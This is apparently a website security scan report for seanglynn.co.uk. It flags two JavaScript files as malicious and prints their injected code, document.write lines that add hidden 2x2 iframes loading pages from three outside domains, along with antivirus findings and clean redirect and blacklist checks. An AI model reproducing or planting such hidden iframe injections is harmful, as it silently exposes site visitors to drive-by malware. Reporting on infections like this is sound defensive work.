Scanned pages/files
Request | Server response | Status |
http://www.seanglynn.co.uk/ | 200 OK Content-Length: 3766 Content-Type: text/html | clean |
http://www.seanglynn.co.uk/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 3829 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=3188812></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3188812></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=1413051&g case "class": case "title": case "accesskey": case "name": case "id": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=3188812
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=3188812>
Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=1413051
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=1413051>
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3188812
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3188812>
http://www.seanglynn.co.uk/Scripts/AC_ActiveX.js | 200 OK Content-Length: 2609 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=3188812></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3188812></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=1413051&g case "width": case "height": case "align": case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } return ret; }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3188812
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3188812>
Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=1413051
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=1413051>
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=3188812
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=3188812>
http://www.seanglynn.co.uk/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: seanglynn.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: seanglynn.co.uk
Referer: http://www.google.com/search?q=seanglynn.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=seanglynn.co.uk
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://seanglynn.co.uk/
Result: seanglynn.co.uk is not infected or malware details are not published yet.